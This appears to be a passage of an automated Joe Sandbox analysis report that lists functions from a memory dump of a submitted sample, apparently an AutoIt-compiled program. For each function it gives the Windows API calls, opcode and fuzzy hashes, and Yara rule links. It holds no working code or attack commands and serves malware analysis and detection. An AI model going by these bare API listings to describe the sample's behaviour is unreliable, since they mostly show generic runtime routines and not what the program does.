Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: f94f97d78c060c3d2224f5d5852b9dd109ea93d6e5e92a4338011b3c1929331d
Instruction ID: 4bbd9bac9bf831f39e6f03e580ba88515304499c9845b3b00ed446991a58a0bc
Opcode Fuzzy Hash: f94f97d78c060c3d2224f5d5852b9dd109ea93d6e5e92a4338011b3c1929331d
Instruction Fuzzy Hash: DA113A35A01159EFCF10EFA8D989DEE77B8EB05301F500466FA01E7240CB34BA929BA5

Function 00A71142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A6FCED,?,00A70D40,?,00008000), ref: 00A7115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00A6FCED,?,00A70D40,?,00008000), ref: 00A71184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A6FCED,?,00A70D40,?,00008000), ref: 00A7118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00A6FCED,?,00A70D40,?,00008000), ref: 00A711C1

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 1038104229a6ad3fac601e44fa1b9c5d7a56994d874369971f7f5ff6bf7cb67f
Instruction ID: c920866b1c7babfecd57a3b7263f8077b97fa7a6d14bb054cf280b39c925db42
Opcode Fuzzy Hash: 1038104229a6ad3fac601e44fa1b9c5d7a56994d874369971f7f5ff6bf7cb67f
Instruction Fuzzy Hash: 92111C32D00519DBCF00DFE9DD48AEEBBB8FB09711F51825AEA49B6240CA7055918BD5

Function 00A6D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00A6D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00A6D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00A6D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00A6D897

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 183cadddc79de5284920a06f08bd3dfd5828c7e62a5ad24ec6f0a4b8b82867aa
Instruction ID: d30a22b29d2970882e87cd3a8a87ffd70de2596c4e4b50e2a2f9236c1799a209
Opcode Fuzzy Hash: 183cadddc79de5284920a06f08bd3dfd5828c7e62a5ad24ec6f0a4b8b82867aa
Instruction Fuzzy Hash: 49115EB5B05304DFE720CF90DC0CF92BBBCEB40B40F10856AAA16D7050DBB0E9599BA1

Function 00A46FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00A46FDB

Part of subcall function 00A476C2: __fltout2.LIBCMT ref: 00A476EB

__cftog_l.LIBCMT ref: 00A47001
__cftoe_l.LIBCMT ref: 00A47033

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 3c5ecf4ce3a055e302b107d5bf6cb937f64eef9e47c3b0c53305af91b033fa83
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 0B014C7A44918ABBCF265F88DC01CEE3F62BB98350F598415FE5858031D736DAB1AB81

Function 00A9B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00A9B2E4
ScreenToClient.USER32(?,?), ref: 00A9B2FC
ScreenToClient.USER32(?,?), ref: 00A9B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A9B33B

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 4f202cbe2adff0d613b36e3d71b4738c8efdab20aa31378525c335a33b883062
Instruction ID: e63307b5ddefd7eb8f0fa59509e566479a723fedbcd7356b6bb7fb9a97fb88fe
Opcode Fuzzy Hash: 4f202cbe2adff0d613b36e3d71b4738c8efdab20aa31378525c335a33b883062
Instruction Fuzzy Hash: 27114679D00249EFDB41CF99D5449EEBBF5FB08310F104166E914E3620D735AA558F50

Function 00A9B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A9B644
_memset.LIBCMT ref: 00A9B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00AD6F20,00AD6F64), ref: 00A9B682
CloseHandle.KERNEL32 ref: 00A9B694

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: de3ff4dcad962bef013c463b68f7dea9b8bcb0ba0a91393c78c31f74b01611d5
Instruction ID: 712d15f652f8c6a388d9f2b358ad3be7a365a1943a7ef7814172e8af8eb8d0cc
Opcode Fuzzy Hash: de3ff4dcad962bef013c463b68f7dea9b8bcb0ba0a91393c78c31f74b01611d5
Instruction Fuzzy Hash: 5EF05EB26417047EF710A7A1BC46FBB3B9CEB0C395F004022FA0AE9192D7755C0187A8

Function 00A76BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00A76BE6

Part of subcall function 00A776C4: _memset.LIBCMT ref: 00A776F9

_memmove.LIBCMT ref: 00A76C09
_memset.LIBCMT ref: 00A76C16
LeaveCriticalSection.KERNEL32(?), ref: 00A76C26

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: cca4c45dd4d97fee9145f4ba99adede288c84049f0489322180322817d4bc985
Instruction ID: ab1ba635ee21fc53b29326993eae46d42e739f845c4b7252b898dfedab94fa32
Opcode Fuzzy Hash: cca4c45dd4d97fee9145f4ba99adede288c84049f0489322180322817d4bc985
Instruction Fuzzy Hash: E8F0543A200100AFCF016F95DC85E8ABB29EF45361F14C061FE089E227DB31E811CBB4

Function 00A12218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00A12231
SetTextColor.GDI32(?,000000FF), ref: 00A1223B
SetBkMode.GDI32(?,00000001), ref: 00A12250
GetStockObject.GDI32(00000005), ref: 00A12258
GetWindowDC.USER32(?,00000000), ref: 00A4BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00A4BE90
GetPixel.GDI32(00000000,?,00000000), ref: 00A4BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00A4BEC2
GetPixel.GDI32(00000000,?,?), ref: 00A4BEE2
ReleaseDC.USER32(?,00000000), ref: 00A4BEED

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: d11ba6d5571c74d5b79ae894d5dbfb17103a8b537d01fba7453822f259cbf1df
Instruction ID: 6a17b440e7b18fc85e37c74d986986cebb965480a085d6ef3858e570aff819bb
Opcode Fuzzy Hash: d11ba6d5571c74d5b79ae894d5dbfb17103a8b537d01fba7453822f259cbf1df
Instruction Fuzzy Hash: 74E03031204144AEDF219FA4EC4D7D83B10EB45332F208367FB69880E18B718991DB61

Function 00A68712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00A6871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00A682E6), ref: 00A68722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A682E6), ref: 00A6872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00A682E6), ref: 00A68736

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 11fe4cae7817cd1b17bdc9f15faadac4068bd0e78e047a332330915861be9278
Instruction ID: 9d3eff2e45c91031c5c483d67b606d9eb7bf8d011dcd7445f2c5abee7e3b9329
Opcode Fuzzy Hash: 11fe4cae7817cd1b17bdc9f15faadac4068bd0e78e047a332330915861be9278
Instruction Fuzzy Hash: C3E086367112119FDB209FF05D0DB973BBCEF54B91F144829B645C9080EE788452C750

Function 00A6B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00A6B4BE

Strings

Container, xrefs: 00A6B43B
AutoIt3GUI, xrefs: 00A6B436

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 6f832de643cc0c0ce7c52633742f03e2b9cc4414ffcedb1db05545b61e700fb4
Instruction ID: 5a7fc71865a0fe77d2172568975fca75651344698a4694723728d321e4936971
Opcode Fuzzy Hash: 6f832de643cc0c0ce7c52633742f03e2b9cc4414ffcedb1db05545b61e700fb4
Instruction Fuzzy Hash: 02913970610601AFDB14DF68C884BAAB7F5FF49710F20856DF946CB6A1DB71E881CB60

Function 00A7AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2FC86: _wcscpy.LIBCMT ref: 00A2FCA9

Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC

__wcsnicmp.LIBCMT ref: 00A7B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00A7B0F6

Strings

LPT, xrefs: 00A7B027

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 842f972c8a8f9d561aa7719b33cd805587a7f08722bd9ed7d91b060f3cc92eda
Instruction ID: 25ae10a7b04d7d05029db256f85780602760ad989e426dad446839f590e54594
Opcode Fuzzy Hash: 842f972c8a8f9d561aa7719b33cd805587a7f08722bd9ed7d91b060f3cc92eda
Instruction Fuzzy Hash: F76173B5A10215AFCB14DF54C961FEEB7B4EF08310F10C169F91AAB251D730AE41CB64

Function 00A22957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00A22968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00A22981

Strings

@, xrefs: 00A22975

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 67a5ba400ad317c65eca411f51ae1300c9eebee5faca0f49f8262d19e78ee213
Instruction ID: 102be2e899b41b6e990b1f75ab102fe310ef9e13a23f25673439e7a0c8314b7b
Opcode Fuzzy Hash: 67a5ba400ad317c65eca411f51ae1300c9eebee5faca0f49f8262d19e78ee213
Instruction Fuzzy Hash: DC514772408744ABD720EF50D986BEFBBE8FB85344F41885DF2D8410A2DB308569CB66

Function 00A79734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00A14F0B: __fread_nolock.LIBCMT ref: 00A14F29

_wcscmp.LIBCMT ref: 00A79824
_wcscmp.LIBCMT ref: 00A79837

Strings

FILE, xrefs: 00A79770

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: f9f4952b643d01ce182532d8060ccda44e84141b5e34063fd763b278152d6708
Instruction ID: ce4f1181b73423e760062854d692b4a4491d0393ab315ba299cbb74856e7fc82
Opcode Fuzzy Hash: f9f4952b643d01ce182532d8060ccda44e84141b5e34063fd763b278152d6708
Instruction Fuzzy Hash: 0441C875A40219BADF209FA4CC46FEFBBBDEF89710F00846AF904F7181DA7199458B61

Function 00A8258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A8259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A825D4

Strings

|, xrefs: 00A825A5

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 5a5f092ad7d139133c9b863f1407cd70cc13f3daff9c4dfb8e195ecb8a9da59b
Instruction ID: 02f47e95c572e4c6fcd5e8fe444a641f720bef979560201136eb7017d0a2577e
Opcode Fuzzy Hash: 5a5f092ad7d139133c9b863f1407cd70cc13f3daff9c4dfb8e195ecb8a9da59b
Instruction Fuzzy Hash: BB31F771800119EBCF11EFA4CD85EEEBFB9FF08350F101069F915A6262EB355996DB60

Function 00A97A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00A97B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A97B76

Strings

', xrefs: 00A97ACA

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 8190e7f471579d164e79ec9bc55887d1d3f742e41da2bd0a9e99b6c7780facc8
Instruction ID: 379ee2f74d3d2c12b039ac40aa1aad51ace98ab38cf97c9a0db176adde15ef71
Opcode Fuzzy Hash: 8190e7f471579d164e79ec9bc55887d1d3f742e41da2bd0a9e99b6c7780facc8
Instruction Fuzzy Hash: AC41E374A0520A9FDF14CF68C981BEEBBF5FB08340F10016AE905AB391E770A951CFA0

Function 00A96A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00A96B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A96B53

Strings

static, xrefs: 00A96AB3

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 9acd878c28146acd78ae6a79d72988323b00ec7d787eed2d8be13bd2d0c209dc
Instruction ID: 93edc9d6023befa340e88c584232c06a37c212b3e888d5301dc4f0cfc9bfa130
Opcode Fuzzy Hash: 9acd878c28146acd78ae6a79d72988323b00ec7d787eed2d8be13bd2d0c209dc
Instruction Fuzzy Hash: E7313871210604AEDF109F68D891AFB77F9FF48760F10861AF9A9D7190DA31AC92DB60

Function 00A728A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A72911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A7294C

Strings

0, xrefs: 00A7290A

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
